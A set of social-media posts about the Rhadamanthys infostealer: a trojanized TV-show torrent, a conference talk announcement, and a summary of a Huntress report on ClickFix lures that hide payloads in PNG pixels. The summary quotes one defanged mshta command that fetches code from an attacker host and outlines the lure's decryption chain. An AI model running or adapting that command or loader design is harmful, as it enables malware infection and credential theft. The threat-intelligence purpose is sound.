Watch out as new .NET AOT malware hides its code as a black box, making detection far harder while delivering Rhadamanthys infostealer and crypto miner.

Read: https://hackread.com/net-aot-malware-code-black-box-evade-detection/

#CyberSecurity #Rhadamanthys #InfoStealer #CryptoMiner

Join me next week at the @SANSInstitute #CTISummit in Arlington, VA where I'll be presenting on an operation against the infostealer #Rhadamanthys from early in its development.

Register @ https://www.sans.org/u/1CtB

Come see me talk at the @SANSInstitute #CTISummit in Arlington, VA about the infostealer #Rhadamanthys during its early development.

https://www.sans.org/u/1CtB

I'm speaking at the @SANSInstitute #CTISummit on an operation against #Rhadamanthys years before #OperationEndgame.

https://www.sans.org/u/1CtB

Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.

Tell your friends: This is why it's sometimes dangerous to pirate stuff.

The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.

Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out --yet.

The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.

https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down

https://www.virustotal.com/gui/file/a11f4f6270b44992837a3f3869397c00fc19176c673abd15edbda39e45227fd5/details

🎯 Threat Intelligence
===================

Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

🔗 Source: https://www.huntress.com/blog/clickfix-malware-buried-in-images

https://winbuzzer.com/2025/11/28/fake-windows-update-notifications-clickfix-malware-campaign-shifts-to-png-steganography-to-evade-detection-xcxwbn/

Fake Windows Update Notifications: ClickFix Malware Campaign Uses PNG Steganography to Evade Detection

#Security #Malware #Cybercrime #Phishing #Microsoft #Windows11 #Cybersecurity #Hackers #Steganography #Rhadamanthys #ClickFix #Infosecurity #ThreatIntel

Gefälschte Windows‑Updates: Wie der ClickFix‑Angriff Malware auf Windows-PCs schleust

Ein neuer Einfall von Cyberkriminellen macht die Gefahr von gefälschten Windows‑Updates deutlich. Unter dem Namen ClickFix locken Angreifer Windows-Nutzer:innen mit einer täuschend echten Update‑Animation, die in einem Vollbild‑Browserfenster angezeigt wird. Während das Bild den Anschein erweckt, ein echtes Systemupdate zu installieren, steckt dahinter ein heimlicher Schadcode, der in den Pixeln eines Bildes verborgen ist.

Mehr: https://maniabel.work/archiv/564

#clickfixphishing #WindowsUpdate #ClickFix #PNGstagnography #LummaC2 #Rhadamanthys #infosec #infosecnews #BeDiS